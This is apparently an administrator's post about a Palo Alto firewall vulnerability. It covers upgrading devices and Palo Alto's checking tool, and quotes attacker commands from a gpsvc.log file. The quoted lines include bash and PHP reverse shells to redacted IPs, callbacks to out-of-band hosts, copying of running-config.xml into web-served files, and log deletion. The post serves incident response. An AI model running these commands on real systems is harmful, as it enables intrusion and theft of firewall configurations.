This Palo Alto vulnerability has been a huge headache last week. I guess we have every firewall upgraded to a safe version now (10.2.8-h3). So, damage may have been minor from this.
I have been following the chatter on reddit, and Palo Alto Networks has a new tool that will check your Tech Support Files and let you know if your device has been exploited and you have to do a device reset, or if has not and you just need to upgrade. So far, all of our devices only need an upgrade based on that tool.
I checked the gpsvc.log file and I can see a lot of commands trying to export config files and info, delete files, and attempt to start a reverse shell with "bash -i" and then "php -r"
I redacted the IP addresses.
cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/portal/images/logo-pan-48125a.png
tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.sex.js /opt/pancfg/mgmt/saved-configs/running-config.xml
rm -rf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.sex.js
rm -rf /opt/panlogs/tmp/device_telemetry/minute/*
echo 123456 > /var/appweb/sslvpndocs/global-protect/portal/js/jquerys.max.js
tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/HMlHkU.js /opt/pancfg/mgmt/saved-configs/running-config.xml
curl rql4aekqvrqe8eizlf16skvjcai36tui.oastify.com
echo 3acf16259def65456fc2a68ab5e10d96$(uname -a) > /var/appweb/sslvpndocs/global-protect/portal/images/paloalto-logo.txt
bash -i >&/dev/tcp/<ip1>/443 0>&1
cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/portal/images/rpp.txt
bash -i >&/dev/tcp/<ip1>/7070 0>&1
bash -i >& /dev/tcp/<ip2>/5000 0>&1
touch /var/appweb/sslvpndocs/global-protect/portal/images/foob2.txt
/usr/bin/php -r '$sock=fsockopen("<ip2>",5000);$proc=proc_open("bash", array(0=>$sock,1=>$sock, 2=>$sock),$pipes);'
php -r '$sock=fsockopen("<ip2>",5000);$proc=proc_open("bash", array(0=>$sock, 1=>$sock,2=>$sock),$pipes);'
touch /var/appweb/sslvpndocs/global-protect/portal/images/foob2.txt
curl obugthbjgbtxngvppgaonru691httfo9n.oast.funAttackers are likely using common pentesting tools like Burp Suite to grab session ids and other information that they could use. This could have been automated also, but very difficult to tell.
It's very tough to know if these commands were successful or not without having Palo Alto TAC involved, and TAC is completely swamped with all of this, so we were not able to get much from them so far.
Analysis by Volexity
Since TAC has re-examined these Tech Support files and they came back that there was no malicious compromises or code executions, they recommended an upgrade only. I really hope those reverse shell attempts failed.